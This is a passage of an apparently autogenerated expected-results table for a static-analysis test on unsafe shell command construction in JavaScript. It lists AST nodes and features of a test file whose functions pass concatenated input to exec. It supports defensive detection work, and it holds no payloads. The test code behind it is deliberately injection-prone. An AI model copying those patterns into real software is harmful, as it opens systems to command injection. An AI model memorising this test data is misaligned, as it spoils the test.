autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:479:12:479:15 | exec | enclosingFunctionName | check | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:479:12:479:15 | exec | fileImports | ./isImported ./lib2.js async-execute child_process fs mz/child_process path printf util | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:479:12:479:20 | exceptional return of exec(cmd) | contextFunctionInterfaces | Cla5(name)\nMyTrainer(opts)\naccessSync(name)\narrays(name)\nasyncStuff(name)\nbar(name)\nbar(name)\nbla(name)\nblackList2(name)\nblacklistOfChars(name)\nboundProblem(safe, unsafe)\nbuild(first, last)\ncheck(config)\ncla()\ncla2()\ncleanInput(s)\ncmd(command, name)\nconstructor()\nconstructor(name)\nconstructor(name)\nexports(name)\nflow(name)\nfoo(name)\nfoo(name)\nformat(name)\nget()\ngoodSanitizer(name)\nguard(name)\nguard2(name)\nid(x)\nindirect(name)\nindirect2(name)\nmethod(name)\nmethod(name)\nmyExec(cmd)\nmyFunc(name)\nmyIndirectThing(name)\nmz(name)\nproblematic(n)\nsafe(name)\nsanitizeShellString(str)\nsanitizer(name)\nsanitizer2(name)\nsanitizer3(name)\nsanitizer4(name)\nsanitizerProperty(obj)\nshellOption(name)\nsplitConcat(name)\nstart(opts)\nstringConcat(name)\ntrain()\ntypeofNumber(n)\ntypeofcheck(arg)\ntypeofcheck(name)\nunproblematic()\nvalid(name)\nwha(name)\nwhitelistOfChars(name)\nyetAnohterSanitizer(str) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:479:12:479:20 | exceptional return of exec(cmd) | contextSurroundingFunctionParameters | | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:479:12:479:20 | exceptional return of exec(cmd) | enclosingFunctionBody | config cmd path join config installedPath myBinary -v exec cmd | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:479:12:479:20 | exceptional return of exec(cmd) | enclosingFunctionName | check | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:479:12:479:20 | exceptional return of exec(cmd) | fileImports | ./isImported ./lib2.js async-execute child_process fs mz/child_process path printf util | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:479:12:479:20 | exec(cmd) | contextFunctionInterfaces | Cla5(name)\nMyTrainer(opts)\naccessSync(name)\narrays(name)\nasyncStuff(name)\nbar(name)\nbar(name)\nbla(name)\nblackList2(name)\nblacklistOfChars(name)\nboundProblem(safe, unsafe)\nbuild(first, last)\ncheck(config)\ncla()\ncla2()\ncleanInput(s)\ncmd(command, name)\nconstructor()\nconstructor(name)\nconstructor(name)\nexports(name)\nflow(name)\nfoo(name)\nfoo(name)\nformat(name)\nget()\ngoodSanitizer(name)\nguard(name)\nguard2(name)\nid(x)\nindirect(name)\nindirect2(name)\nmethod(name)\nmethod(name)\nmyExec(cmd)\nmyFunc(name)\nmyIndirectThing(name)\nmz(name)\nproblematic(n)\nsafe(name)\nsanitizeShellString(str)\nsanitizer(name)\nsanitizer2(name)\nsanitizer3(name)\nsanitizer4(name)\nsanitizerProperty(obj)\nshellOption(name)\nsplitConcat(name)\nstart(opts)\nstringConcat(name)\ntrain()\ntypeofNumber(n)\ntypeofcheck(arg)\ntypeofcheck(name)\nunproblematic()\nvalid(name)\nwha(name)\nwhitelistOfChars(name)\nyetAnohterSanitizer(str) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:479:12:479:20 | exec(cmd) | contextSurroundingFunctionParameters | (config) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:479:12:479:20 | exec(cmd) | enclosingFunctionBody | config cmd path join config installedPath myBinary -v exec cmd | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:479:12:479:20 | exec(cmd) | enclosingFunctionName | check | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:479:12:479:20 | exec(cmd) | fileImports | ./isImported ./lib2.js async-execute child_process fs mz/child_process path printf util | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:479:17:479:19 | cmd | CalleeFlexibleAccessPath | exec | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:479:17:479:19 | cmd | InputArgumentIndex | 0 | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:479:17:479:19 | cmd | calleeImports | util | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:479:17:479:19 | cmd | contextFunctionInterfaces | Cla5(name)\nMyTrainer(opts)\naccessSync(name)\narrays(name)\nasyncStuff(name)\nbar(name)\nbar(name)\nbla(name)\nblackList2(name)\nblacklistOfChars(name)\nboundProblem(safe, unsafe)\nbuild(first, last)\ncheck(config)\ncla()\ncla2()\ncleanInput(s)\ncmd(command, name)\nconstructor()\nconstructor(name)\nconstructor(name)\nexports(name)\nflow(name)\nfoo(name)\nfoo(name)\nformat(name)\nget()\ngoodSanitizer(name)\nguard(name)\nguard2(name)\nid(x)\nindirect(name)\nindirect2(name)\nmethod(name)\nmethod(name)\nmyExec(cmd)\nmyFunc(name)\nmyIndirectThing(name)\nmz(name)\nproblematic(n)\nsafe(name)\nsanitizeShellString(str)\nsanitizer(name)\nsanitizer2(name)\nsanitizer3(name)\nsanitizer4(name)\nsanitizerProperty(obj)\nshellOption(name)\nsplitConcat(name)\nstart(opts)\nstringConcat(name)\ntrain()\ntypeofNumber(n)\ntypeofcheck(arg)\ntypeofcheck(name)\nunproblematic()\nvalid(name)\nwha(name)\nwhitelistOfChars(name)\nyetAnohterSanitizer(str) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:479:17:479:19 | cmd | contextSurroundingFunctionParameters | (config) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:479:17:479:19 | cmd | enclosingFunctionBody | config cmd path join config installedPath myBinary -v exec cmd | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:479:17:479:19 | cmd | enclosingFunctionName | check | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:479:17:479:19 | cmd | fileImports | ./isImported ./lib2.js async-execute child_process fs mz/child_process path printf util | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:482:1:482:6 | module | contextFunctionInterfaces | Cla5(name)\nMyTrainer(opts)\naccessSync(name)\narrays(name)\nasyncStuff(name)\nbar(name)\nbar(name)\nbla(name)\nblackList2(name)\nblacklistOfChars(name)\nboundProblem(safe, unsafe)\nbuild(first, last)\ncheck(config)\ncla()\ncla2()\ncleanInput(s)\ncmd(command, name)\nconstructor()\nconstructor(name)\nconstructor(name)\nexports(name)\nflow(name)\nfoo(name)\nfoo(name)\nformat(name)\nget()\ngoodSanitizer(name)\nguard(name)\nguard2(name)\nid(x)\nindirect(name)\nindirect2(name)\nmethod(name)\nmethod(name)\nmyExec(cmd)\nmyFunc(name)\nmyIndirectThing(name)\nmz(name)\nproblematic(n)\nsafe(name)\nsanitizeShellString(str)\nsanitizer(name)\nsanitizer2(name)\nsanitizer3(name)\nsanitizer4(name)\nsanitizerProperty(obj)\nshellOption(name)\nsplitConcat(name)\nstart(opts)\nstringConcat(name)\ntrain()\ntypeofNumber(n)\ntypeofcheck(arg)\ntypeofcheck(name)\nunproblematic()\nvalid(name)\nwha(name)\nwhitelistOfChars(name)\nyetAnohterSanitizer(str) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:482:1:482:6 | module | contextSurroundingFunctionParameters | | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:482:1:482:6 | module | fileImports | ./isImported ./lib2.js async-execute child_process fs mz/child_process path printf util | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:482:1:482:14 | module.exports | contextFunctionInterfaces | Cla5(name)\nMyTrainer(opts)\naccessSync(name)\narrays(name)\nasyncStuff(name)\nbar(name)\nbar(name)\nbla(name)\nblackList2(name)\nblacklistOfChars(name)\nboundProblem(safe, unsafe)\nbuild(first, last)\ncheck(config)\ncla()\ncla2()\ncleanInput(s)\ncmd(command, name)\nconstructor()\nconstructor(name)\nconstructor(name)\nexports(name)\nflow(name)\nfoo(name)\nfoo(name)\nformat(name)\nget()\ngoodSanitizer(name)\nguard(name)\nguard2(name)\nid(x)\nindirect(name)\nindirect2(name)\nmethod(name)\nmethod(name)\nmyExec(cmd)\nmyFunc(name)\nmyIndirectThing(name)\nmz(name)\nproblematic(n)\nsafe(name)\nsanitizeShellString(str)\nsanitizer(name)\nsanitizer2(name)\nsanitizer3(name)\nsanitizer4(name)\nsanitizerProperty(obj)\nshellOption(name)\nsplitConcat(name)\nstart(opts)\nstringConcat(name)\ntrain()\ntypeofNumber(n)\ntypeofcheck(arg)\ntypeofcheck(name)\nunproblematic()\nvalid(name)\nwha(name)\nwhitelistOfChars(name)\nyetAnohterSanitizer(str) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:482:1:482:14 | module.exports | contextSurroundingFunctionParameters | | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:482:1:482:14 | module.exports | fileImports | ./isImported ./lib2.js async-execute child_process fs mz/child_process path printf util | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:482:1:482:26 | module. ... tConcat | contextFunctionInterfaces | Cla5(name)\nMyTrainer(opts)\naccessSync(name)\narrays(name)\nasyncStuff(name)\nbar(name)\nbar(name)\nbla(name)\nblackList2(name)\nblacklistOfChars(name)\nboundProblem(safe, unsafe)\nbuild(first, last)\ncheck(config)\ncla()\ncla2()\ncleanInput(s)\ncmd(command, name)\nconstructor()\nconstructor(name)\nconstructor(name)\nexports(name)\nflow(name)\nfoo(name)\nfoo(name)\nformat(name)\nget()\ngoodSanitizer(name)\nguard(name)\nguard2(name)\nid(x)\nindirect(name)\nindirect2(name)\nmethod(name)\nmethod(name)\nmyExec(cmd)\nmyFunc(name)\nmyIndirectThing(name)\nmz(name)\nproblematic(n)\nsafe(name)\nsanitizeShellString(str)\nsanitizer(name)\nsanitizer2(name)\nsanitizer3(name)\nsanitizer4(name)\nsanitizerProperty(obj)\nshellOption(name)\nsplitConcat(name)\nstart(opts)\nstringConcat(name)\ntrain()\ntypeofNumber(n)\ntypeofcheck(arg)\ntypeofcheck(name)\nunproblematic()\nvalid(name)\nwha(name)\nwhitelistOfChars(name)\nyetAnohterSanitizer(str) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:482:1:482:26 | module. ... tConcat | contextSurroundingFunctionParameters | | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:482:1:482:26 | module. ... tConcat | fileImports | ./isImported ./lib2.js async-execute child_process fs mz/child_process path printf util | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:482:1:486:1 | module. ... rgs);\\n} | contextFunctionInterfaces | Cla5(name)\nMyTrainer(opts)\naccessSync(name)\narrays(name)\nasyncStuff(name)\nbar(name)\nbar(name)\nbla(name)\nblackList2(name)\nblacklistOfChars(name)\nboundProblem(safe, unsafe)\nbuild(first, last)\ncheck(config)\ncla()\ncla2()\ncleanInput(s)\ncmd(command, name)\nconstructor()\nconstructor(name)\nconstructor(name)\nexports(name)\nflow(name)\nfoo(name)\nfoo(name)\nformat(name)\nget()\ngoodSanitizer(name)\nguard(name)\nguard2(name)\nid(x)\nindirect(name)\nindirect2(name)\nmethod(name)\nmethod(name)\nmyExec(cmd)\nmyFunc(name)\nmyIndirectThing(name)\nmz(name)\nproblematic(n)\nsafe(name)\nsanitizeShellString(str)\nsanitizer(name)\nsanitizer2(name)\nsanitizer3(name)\nsanitizer4(name)\nsanitizerProperty(obj)\nshellOption(name)\nsplitConcat(name)\nstart(opts)\nstringConcat(name)\ntrain()\ntypeofNumber(n)\ntypeofcheck(arg)\ntypeofcheck(name)\nunproblematic()\nvalid(name)\nwha(name)\nwhitelistOfChars(name)\nyetAnohterSanitizer(str) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:482:1:486:1 | module. ... rgs);\\n} | contextSurroundingFunctionParameters | | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:482:1:486:1 | module. ... rgs);\\n} | fileImports | ./isImported ./lib2.js async-execute child_process fs mz/child_process path printf util | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:482:8:482:14 | exports | contextFunctionInterfaces | Cla5(name)\nMyTrainer(opts)\naccessSync(name)\narrays(name)\nasyncStuff(name)\nbar(name)\nbar(name)\nbla(name)\nblackList2(name)\nblacklistOfChars(name)\nboundProblem(safe, unsafe)\nbuild(first, last)\ncheck(config)\ncla()\ncla2()\ncleanInput(s)\ncmd(command, name)\nconstructor()\nconstructor(name)\nconstructor(name)\nexports(name)\nflow(name)\nfoo(name)\nfoo(name)\nformat(name)\nget()\ngoodSanitizer(name)\nguard(name)\nguard2(name)\nid(x)\nindirect(name)\nindirect2(name)\nmethod(name)\nmethod(name)\nmyExec(cmd)\nmyFunc(name)\nmyIndirectThing(name)\nmz(name)\nproblematic(n)\nsafe(name)\nsanitizeShellString(str)\nsanitizer(name)\nsanitizer2(name)\nsanitizer3(name)\nsanitizer4(name)\nsanitizerProperty(obj)\nshellOption(name)\nsplitConcat(name)\nstart(opts)\nstringConcat(name)\ntrain()\ntypeofNumber(n)\ntypeofcheck(arg)\ntypeofcheck(name)\nunproblematic()\nvalid(name)\nwha(name)\nwhitelistOfChars(name)\nyetAnohterSanitizer(str) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:482:8:482:14 | exports | contextSurroundingFunctionParameters | | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:482:8:482:14 | exports | fileImports | ./isImported ./lib2.js async-execute child_process fs mz/child_process path printf util | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:482:16:482:26 | splitConcat | contextFunctionInterfaces | Cla5(name)\nMyTrainer(opts)\naccessSync(name)\narrays(name)\nasyncStuff(name)\nbar(name)\nbar(name)\nbla(name)\nblackList2(name)\nblacklistOfChars(name)\nboundProblem(safe, unsafe)\nbuild(first, last)\ncheck(config)\ncla()\ncla2()\ncleanInput(s)\ncmd(command, name)\nconstructor()\nconstructor(name)\nconstructor(name)\nexports(name)\nflow(name)\nfoo(name)\nfoo(name)\nformat(name)\nget()\ngoodSanitizer(name)\nguard(name)\nguard2(name)\nid(x)\nindirect(name)\nindirect2(name)\nmethod(name)\nmethod(name)\nmyExec(cmd)\nmyFunc(name)\nmyIndirectThing(name)\nmz(name)\nproblematic(n)\nsafe(name)\nsanitizeShellString(str)\nsanitizer(name)\nsanitizer2(name)\nsanitizer3(name)\nsanitizer4(name)\nsanitizerProperty(obj)\nshellOption(name)\nsplitConcat(name)\nstart(opts)\nstringConcat(name)\ntrain()\ntypeofNumber(n)\ntypeofcheck(arg)\ntypeofcheck(name)\nunproblematic()\nvalid(name)\nwha(name)\nwhitelistOfChars(name)\nyetAnohterSanitizer(str) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:482:16:482:26 | splitConcat | contextSurroundingFunctionParameters | | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:482:16:482:26 | splitConcat | fileImports | ./isImported ./lib2.js async-execute child_process fs mz/child_process path printf util | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:482:30:482:29 | cp | contextFunctionInterfaces | Cla5(name)\nMyTrainer(opts)\naccessSync(name)\narrays(name)\nasyncStuff(name)\nbar(name)\nbar(name)\nbla(name)\nblackList2(name)\nblacklistOfChars(name)\nboundProblem(safe, unsafe)\nbuild(first, last)\ncheck(config)\ncla()\ncla2()\ncleanInput(s)\ncmd(command, name)\nconstructor()\nconstructor(name)\nconstructor(name)\nexports(name)\nflow(name)\nfoo(name)\nfoo(name)\nformat(name)\nget()\ngoodSanitizer(name)\nguard(name)\nguard2(name)\nid(x)\nindirect(name)\nindirect2(name)\nmethod(name)\nmethod(name)\nmyExec(cmd)\nmyFunc(name)\nmyIndirectThing(name)\nmz(name)\nproblematic(n)\nsafe(name)\nsanitizeShellString(str)\nsanitizer(name)\nsanitizer2(name)\nsanitizer3(name)\nsanitizer4(name)\nsanitizerProperty(obj)\nshellOption(name)\nsplitConcat(name)\nstart(opts)\nstringConcat(name)\ntrain()\ntypeofNumber(n)\ntypeofcheck(arg)\ntypeofcheck(name)\nunproblematic()\nvalid(name)\nwha(name)\nwhitelistOfChars(name)\nyetAnohterSanitizer(str) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:482:30:482:29 | cp | contextSurroundingFunctionParameters | | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:482:30:482:29 | cp | enclosingFunctionBody | name args my name is name cmd echo cp exec cmd args | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:482:30:482:29 | cp | enclosingFunctionName | splitConcat | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:482:30:482:29 | cp | fileImports | ./isImported ./lib2.js async-execute child_process fs mz/child_process path printf util | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:482:30:482:29 | this | contextFunctionInterfaces | Cla5(name)\nMyTrainer(opts)\naccessSync(name)\narrays(name)\nasyncStuff(name)\nbar(name)\nbar(name)\nbla(name)\nblackList2(name)\nblacklistOfChars(name)\nboundProblem(safe, unsafe)\nbuild(first, last)\ncheck(config)\ncla()\ncla2()\ncleanInput(s)\ncmd(command, name)\nconstructor()\nconstructor(name)\nconstructor(name)\nexports(name)\nflow(name)\nfoo(name)\nfoo(name)\nformat(name)\nget()\ngoodSanitizer(name)\nguard(name)\nguard2(name)\nid(x)\nindirect(name)\nindirect2(name)\nmethod(name)\nmethod(name)\nmyExec(cmd)\nmyFunc(name)\nmyIndirectThing(name)\nmz(name)\nproblematic(n)\nsafe(name)\nsanitizeShellString(str)\nsanitizer(name)\nsanitizer2(name)\nsanitizer3(name)\nsanitizer4(name)\nsanitizerProperty(obj)\nshellOption(name)\nsplitConcat(name)\nstart(opts)\nstringConcat(name)\ntrain()\ntypeofNumber(n)\ntypeofcheck(arg)\ntypeofcheck(name)\nunproblematic()\nvalid(name)\nwha(name)\nwhitelistOfChars(name)\nyetAnohterSanitizer(str) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:482:30:482:29 | this | contextSurroundingFunctionParameters | | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:482:30:482:29 | this | enclosingFunctionBody | name args my name is name cmd echo cp exec cmd args | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:482:30:482:29 | this | enclosingFunctionName | splitConcat | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:482:30:482:29 | this | fileImports | ./isImported ./lib2.js async-execute child_process fs mz/child_process path printf util | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:482:30:486:1 | 'arguments' object of anonymous function | contextFunctionInterfaces | Cla5(name)\nMyTrainer(opts)\naccessSync(name)\narrays(name)\nasyncStuff(name)\nbar(name)\nbar(name)\nbla(name)\nblackList2(name)\nblacklistOfChars(name)\nboundProblem(safe, unsafe)\nbuild(first, last)\ncheck(config)\ncla()\ncla2()\ncleanInput(s)\ncmd(command, name)\nconstructor()\nconstructor(name)\nconstructor(name)\nexports(name)\nflow(name)\nfoo(name)\nfoo(name)\nformat(name)\nget()\ngoodSanitizer(name)\nguard(name)\nguard2(name)\nid(x)\nindirect(name)\nindirect2(name)\nmethod(name)\nmethod(name)\nmyExec(cmd)\nmyFunc(name)\nmyIndirectThing(name)\nmz(name)\nproblematic(n)\nsafe(name)\nsanitizeShellString(str)\nsanitizer(name)\nsanitizer2(name)\nsanitizer3(name)\nsanitizer4(name)\nsanitizerProperty(obj)\nshellOption(name)\nsplitConcat(name)\nstart(opts)\nstringConcat(name)\ntrain()\ntypeofNumber(n)\ntypeofcheck(arg)\ntypeofcheck(name)\nunproblematic()\nvalid(name)\nwha(name)\nwhitelistOfChars(name)\nyetAnohterSanitizer(str) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:482:30:486:1 | 'arguments' object of anonymous function | contextSurroundingFunctionParameters | | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:482:30:486:1 | 'arguments' object of anonymous function | enclosingFunctionBody | name args my name is name cmd echo cp exec cmd args | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:482:30:486:1 | 'arguments' object of anonymous function | enclosingFunctionName | splitConcat | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:482:30:486:1 | 'arguments' object of anonymous function | fileImports | ./isImported ./lib2.js async-execute child_process fs mz/child_process path printf util | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:482:30:486:1 | exceptional return of anonymous function | contextFunctionInterfaces | Cla5(name)\nMyTrainer(opts)\naccessSync(name)\narrays(name)\nasyncStuff(name)\nbar(name)\nbar(name)\nbla(name)\nblackList2(name)\nblacklistOfChars(name)\nboundProblem(safe, unsafe)\nbuild(first, last)\ncheck(config)\ncla()\ncla2()\ncleanInput(s)\ncmd(command, name)\nconstructor()\nconstructor(name)\nconstructor(name)\nexports(name)\nflow(name)\nfoo(name)\nfoo(name)\nformat(name)\nget()\ngoodSanitizer(name)\nguard(name)\nguard2(name)\nid(x)\nindirect(name)\nindirect2(name)\nmethod(name)\nmethod(name)\nmyExec(cmd)\nmyFunc(name)\nmyIndirectThing(name)\nmz(name)\nproblematic(n)\nsafe(name)\nsanitizeShellString(str)\nsanitizer(name)\nsanitizer2(name)\nsanitizer3(name)\nsanitizer4(name)\nsanitizerProperty(obj)\nshellOption(name)\nsplitConcat(name)\nstart(opts)\nstringConcat(name)\ntrain()\ntypeofNumber(n)\ntypeofcheck(arg)\ntypeofcheck(name)\nunproblematic()\nvalid(name)\nwha(name)\nwhitelistOfChars(name)\nyetAnohterSanitizer(str) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:482:30:486:1 | exceptional return of anonymous function | contextSurroundingFunctionParameters | | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:482:30:486:1 | exceptional return of anonymous function | enclosingFunctionBody | name args my name is name cmd echo cp exec cmd args | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:482:30:486:1 | exceptional return of anonymous function | enclosingFunctionName | splitConcat | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:482:30:486:1 | exceptional return of anonymous function | fileImports | ./isImported ./lib2.js async-execute child_process fs mz/child_process path printf util | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:482:30:486:1 | functio ... rgs);\\n} | assignedToPropName | splitConcat | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:482:30:486:1 | functio ... rgs);\\n} | contextFunctionInterfaces | Cla5(name)\nMyTrainer(opts)\naccessSync(name)\narrays(name)\nasyncStuff(name)\nbar(name)\nbar(name)\nbla(name)\nblackList2(name)\nblacklistOfChars(name)\nboundProblem(safe, unsafe)\nbuild(first, last)\ncheck(config)\ncla()\ncla2()\ncleanInput(s)\ncmd(command, name)\nconstructor()\nconstructor(name)\nconstructor(name)\nexports(name)\nflow(name)\nfoo(name)\nfoo(name)\nformat(name)\nget()\ngoodSanitizer(name)\nguard(name)\nguard2(name)\nid(x)\nindirect(name)\nindirect2(name)\nmethod(name)\nmethod(name)\nmyExec(cmd)\nmyFunc(name)\nmyIndirectThing(name)\nmz(name)\nproblematic(n)\nsafe(name)\nsanitizeShellString(str)\nsanitizer(name)\nsanitizer2(name)\nsanitizer3(name)\nsanitizer4(name)\nsanitizerProperty(obj)\nshellOption(name)\nsplitConcat(name)\nstart(opts)\nstringConcat(name)\ntrain()\ntypeofNumber(n)\ntypeofcheck(arg)\ntypeofcheck(name)\nunproblematic()\nvalid(name)\nwha(name)\nwhitelistOfChars(name)\nyetAnohterSanitizer(str) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:482:30:486:1 | functio ... rgs);\\n} | contextSurroundingFunctionParameters | (name) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:482:30:486:1 | functio ... rgs);\\n} | fileImports | ./isImported ./lib2.js async-execute child_process fs mz/child_process path printf util | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:482:30:486:1 | return of anonymous function | contextFunctionInterfaces | Cla5(name)\nMyTrainer(opts)\naccessSync(name)\narrays(name)\nasyncStuff(name)\nbar(name)\nbar(name)\nbla(name)\nblackList2(name)\nblacklistOfChars(name)\nboundProblem(safe, unsafe)\nbuild(first, last)\ncheck(config)\ncla()\ncla2()\ncleanInput(s)\ncmd(command, name)\nconstructor()\nconstructor(name)\nconstructor(name)\nexports(name)\nflow(name)\nfoo(name)\nfoo(name)\nformat(name)\nget()\ngoodSanitizer(name)\nguard(name)\nguard2(name)\nid(x)\nindirect(name)\nindirect2(name)\nmethod(name)\nmethod(name)\nmyExec(cmd)\nmyFunc(name)\nmyIndirectThing(name)\nmz(name)\nproblematic(n)\nsafe(name)\nsanitizeShellString(str)\nsanitizer(name)\nsanitizer2(name)\nsanitizer3(name)\nsanitizer4(name)\nsanitizerProperty(obj)\nshellOption(name)\nsplitConcat(name)\nstart(opts)\nstringConcat(name)\ntrain()\ntypeofNumber(n)\ntypeofcheck(arg)\ntypeofcheck(name)\nunproblematic()\nvalid(name)\nwha(name)\nwhitelistOfChars(name)\nyetAnohterSanitizer(str) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:482:30:486:1 | return of anonymous function | contextSurroundingFunctionParameters | | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:482:30:486:1 | return of anonymous function | enclosingFunctionBody | name args my name is name cmd echo cp exec cmd args | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:482:30:486:1 | return of anonymous function | enclosingFunctionName | splitConcat | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:482:30:486:1 | return of anonymous function | fileImports | ./isImported ./lib2.js async-execute child_process fs mz/child_process path printf util | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:482:40:482:43 | name | contextFunctionInterfaces | Cla5(name)\nMyTrainer(opts)\naccessSync(name)\narrays(name)\nasyncStuff(name)\nbar(name)\nbar(name)\nbla(name)\nblackList2(name)\nblacklistOfChars(name)\nboundProblem(safe, unsafe)\nbuild(first, last)\ncheck(config)\ncla()\ncla2()\ncleanInput(s)\ncmd(command, name)\nconstructor()\nconstructor(name)\nconstructor(name)\nexports(name)\nflow(name)\nfoo(name)\nfoo(name)\nformat(name)\nget()\ngoodSanitizer(name)\nguard(name)\nguard2(name)\nid(x)\nindirect(name)\nindirect2(name)\nmethod(name)\nmethod(name)\nmyExec(cmd)\nmyFunc(name)\nmyIndirectThing(name)\nmz(name)\nproblematic(n)\nsafe(name)\nsanitizeShellString(str)\nsanitizer(name)\nsanitizer2(name)\nsanitizer3(name)\nsanitizer4(name)\nsanitizerProperty(obj)\nshellOption(name)\nsplitConcat(name)\nstart(opts)\nstringConcat(name)\ntrain()\ntypeofNumber(n)\ntypeofcheck(arg)\ntypeofcheck(name)\nunproblematic()\nvalid(name)\nwha(name)\nwhitelistOfChars(name)\nyetAnohterSanitizer(str) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:482:40:482:43 | name | contextFunctionInterfaces | Cla5(name)\nMyTrainer(opts)\naccessSync(name)\narrays(name)\nasyncStuff(name)\nbar(name)\nbar(name)\nbla(name)\nblackList2(name)\nblacklistOfChars(name)\nboundProblem(safe, unsafe)\nbuild(first, last)\ncheck(config)\ncla()\ncla2()\ncleanInput(s)\ncmd(command, 